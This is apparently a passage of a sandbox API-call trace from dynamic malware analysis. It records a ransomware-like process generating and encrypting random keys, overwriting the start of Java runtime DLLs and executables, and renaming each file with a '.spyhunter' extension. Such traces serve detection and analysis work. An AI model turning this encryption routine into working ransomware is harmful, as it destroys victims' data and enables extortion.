hHeap=0x2c0000) returned 1 [0174.833] GetProcessHeap () returned 0x2c0000 [0174.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.833] GetProcessHeap () returned 0x2c0000 [0174.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20e90 | out: hHeap=0x2c0000) returned 1 [0174.833] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4e0 | out: pbBuffer=0x270e4e0) returned 1 [0174.833] GetProcessHeap () returned 0x2c0000 [0174.833] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.833] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4d8*=0x30) returned 1 [0174.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdwp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.841] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll") returned 49 [0174.841] StrStrW (lpFirst="jdwp.dll", lpSrch=".txt") returned 0x0 [0174.841] GetProcessHeap () returned 0x2c0000 [0174.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.841] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e49c*=0x2800, lpOverlapped=0x0) returned 1 [0174.887] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.887] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e49c*=0x2800, lpOverlapped=0x0) returned 1 [0174.888] GetProcessHeap () returned 0x2c0000 [0174.888] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.888] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.888] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x270e4dc*, lpNumberOfBytesWritten=0x270e49c*=0x4, lpOverlapped=0x0) returned 1 [0174.892] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e49c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e49c*=0x30, lpOverlapped=0x0) returned 1 [0174.892] CloseHandle (hObject=0x9c) returned 1 [0174.892] GetProcessHeap () returned 0x2c0000 [0174.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.892] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll.spyhunter") returned 59 [0174.892] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdwp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jdwp.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jdwp.dll.spyhunter")) returned 1 [0174.893] GetProcessHeap () returned 0x2c0000 [0174.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.893] GetProcessHeap () returned 0x2c0000 [0174.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.893] GetProcessHeap () returned 0x2c0000 [0174.893] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20d30 | out: hHeap=0x2c0000) returned 1 [0174.893] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4d8 | out: pbBuffer=0x270e4d8) returned 1 [0174.893] GetProcessHeap () returned 0x2c0000 [0174.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.894] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4d0*=0x30) returned 1 [0174.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.895] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll") returned 49 [0174.895] StrStrW (lpFirst="jawt.dll", lpSrch=".txt") returned 0x0 [0174.895] GetProcessHeap () returned 0x2c0000 [0174.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.895] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e494*=0x2800, lpOverlapped=0x0) returned 1 [0174.897] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.897] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e494*=0x2800, lpOverlapped=0x0) returned 1 [0174.897] GetProcessHeap () returned 0x2c0000 [0174.898] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.898] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.898] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x270e4d4*, lpNumberOfBytesWritten=0x270e494*=0x4, lpOverlapped=0x0) returned 1 [0174.898] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e494*=0x30, lpOverlapped=0x0) returned 1 [0174.898] CloseHandle (hObject=0x9c) returned 1 [0174.898] GetProcessHeap () returned 0x2c0000 [0174.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.898] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll.spyhunter") returned 59 [0174.898] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\jawt.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\jawt.dll.spyhunter")) returned 1 [0174.900] GetProcessHeap () returned 0x2c0000 [0174.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.900] GetProcessHeap () returned 0x2c0000 [0174.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.900] GetProcessHeap () returned 0x2c0000 [0174.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20c80 | out: hHeap=0x2c0000) returned 1 [0174.900] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4d8 | out: pbBuffer=0x270e4d8) returned 1 [0174.900] GetProcessHeap () returned 0x2c0000 [0174.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.901] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4d0*=0x30) returned 1 [0174.901] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java_crw_demo.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.901] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll") returned 58 [0174.902] StrStrW (lpFirst="java_crw_demo.dll", lpSrch=".txt") returned 0x0 [0174.902] GetProcessHeap () returned 0x2c0000 [0174.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.902] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e494*=0x2800, lpOverlapped=0x0) returned 1 [0174.908] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.908] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e494*=0x2800, lpOverlapped=0x0) returned 1 [0174.908] GetProcessHeap () returned 0x2c0000 [0174.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.909] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.909] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x270e4d4*, lpNumberOfBytesWritten=0x270e494*=0x4, lpOverlapped=0x0) returned 1 [0174.909] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e494, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e494*=0x30, lpOverlapped=0x0) returned 1 [0174.909] CloseHandle (hObject=0x9c) returned 1 [0174.909] GetProcessHeap () returned 0x2c0000 [0174.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.909] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll.spyhunter") returned 68 [0174.909] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java_crw_demo.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\java_crw_demo.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\java_crw_demo.dll.spyhunter")) returned 1 [0174.910] GetProcessHeap () returned 0x2c0000 [0174.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.910] GetProcessHeap () returned 0x2c0000 [0174.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.910] GetProcessHeap () returned 0x2c0000 [0174.910] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f700 | out: hHeap=0x2c0000) returned 1 [0174.910] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4d0 | out: pbBuffer=0x270e4d0) returned 1 [0174.910] GetProcessHeap () returned 0x2c0000 [0174.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.911] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4c8*=0x30) returned 1 [0174.911] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0174.912] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe") returned 51 [0174.912] StrStrW (lpFirst="javaws.exe", lpSrch=".txt") returned 0x0 [0174.912] GetProcessHeap () returned 0x2c0000 [0174.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.913] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e48c*=0x2800, lpOverlapped=0x0) returned 1 [0174.932] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.932] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e48c*=0x2800, lpOverlapped=0x0) returned 1 [0174.932] GetProcessHeap () returned 0x2c0000 [0174.932] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0174.932] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.933] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x270e4cc*, lpNumberOfBytesWritten=0x270e48c*=0x4, lpOverlapped=0x0) returned 1 [0175.217] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e48c*=0x30, lpOverlapped=0x0) returned 1 [0175.217] CloseHandle (hObject=0x9c) returned 1 [0175.217] GetProcessHeap () returned 0x2c0000 [0175.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.217] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe.spyhunter") returned 61 [0175.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javaws.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javaws.exe.spyhunter")) returned 1 [0175.218] GetProcessHeap () returned 0x2c0000 [0175.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.218] GetProcessHeap () returned 0x2c0000 [0175.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.218] GetProcessHeap () returned 0x2c0000 [0175.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20bd0 | out: hHeap=0x2c0000) returned 1 [0175.219] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4d0 | out: pbBuffer=0x270e4d0) returned 1 [0175.219] GetProcessHeap () returned 0x2c0000 [0175.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.219] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4c8*=0x30) returned 1 [0175.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\instrument.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.219] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll") returned 55 [0175.219] StrStrW (lpFirst="instrument.dll", lpSrch=".txt") returned 0x0 [0175.219] GetProcessHeap () returned 0x2c0000 [0175.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.219] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e48c*=0x2800, lpOverlapped=0x0) returned 1 [0175.234] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.235] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e48c*=0x2800, lpOverlapped=0x0) returned 1 [0175.235] GetProcessHeap () returned 0x2c0000 [0175.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.235] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.235] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x270e4cc*, lpNumberOfBytesWritten=0x270e48c*=0x4, lpOverlapped=0x0) returned 1 [0175.243] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e48c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e48c*=0x30, lpOverlapped=0x0) returned 1 [0175.243] CloseHandle (hObject=0x9c) returned 1 [0175.243] GetProcessHeap () returned 0x2c0000 [0175.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.244] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll.spyhunter") returned 65 [0175.244] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\instrument.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\instrument.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\instrument.dll.spyhunter")) returned 1 [0175.245] GetProcessHeap () returned 0x2c0000 [0175.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.245] GetProcessHeap () returned 0x2c0000 [0175.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.245] GetProcessHeap () returned 0x2c0000 [0175.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2178 | out: hHeap=0x2c0000) returned 1 [0175.245] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4c8 | out: pbBuffer=0x270e4c8) returned 1 [0175.245] GetProcessHeap () returned 0x2c0000 [0175.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.245] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4c0*=0x30) returned 1 [0175.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\installer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.246] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll") returned 54 [0175.246] StrStrW (lpFirst="installer.dll", lpSrch=".txt") returned 0x0 [0175.246] GetProcessHeap () returned 0x2c0000 [0175.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.246] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e484*=0x2800, lpOverlapped=0x0) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.248] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e484*=0x2800, lpOverlapped=0x0) returned 1 [0175.248] GetProcessHeap () returned 0x2c0000 [0175.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.248] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.248] WriteFile (in: hFile=0x9c, lpBuffer=0x270e4c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x270e4c4*, lpNumberOfBytesWritten=0x270e484*=0x4, lpOverlapped=0x0) returned 1 [0175.261] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e484*=0x30, lpOverlapped=0x0) returned 1 [0175.262] CloseHandle (hObject=0x9c) returned 1 [0175.262] GetProcessHeap () returned 0x2c0000 [0175.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.262] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll.spyhunter") returned 64 [0175.262] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\installer.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\installer.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\installer.dll.spyhunter")) returned 1 [0175.263] GetProcessHeap () returned 0x2c0000 [0175.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.263] GetProcessHeap () returned 0x2c0000 [0175.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0175.263] GetProcessHeap () returned 0x2c0000 [0175.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed20c0 | out: hHeap=0x2c0000) returned 1 [0175.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4c8 | out: pbBuffer=0x270e4c8) returned 1 [0175.264] GetProcessHeap () returned 0x2c0000 [0175.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0175.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4c0*=0x30) returned 1 [0175.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\hprof.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0175.265] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\hprof.dll") returned 50 [0175.265] StrStrW (lpFirst="hprof.dll", lpSrch=".txt") returned 0x0 [0175.265] GetProcessHeap () returned 0x2c0000 [0175.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.265] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e484*=0x2800, lpOverlapped=0x0) returned 1 [0175.323] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.324] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e484, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e484*=0x2800, lpOverlapped=0x0) returned 1 [0175.324] GetProcessHeap () returned 0x2c0000 [0175.324] HeapFree (in: 